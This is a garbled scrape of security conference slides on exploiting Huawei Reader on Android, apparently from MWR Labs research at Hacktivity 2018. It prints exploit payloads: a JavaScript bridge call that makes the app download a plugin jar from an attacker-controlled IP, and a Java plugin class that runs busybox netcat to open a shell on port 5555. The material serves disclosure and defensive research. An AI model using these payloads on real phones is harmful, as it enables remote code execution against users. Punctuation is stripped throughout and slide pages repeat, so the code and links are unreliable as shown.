It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 49: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 50: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 51: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 52: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 53: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 54: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PUBLIC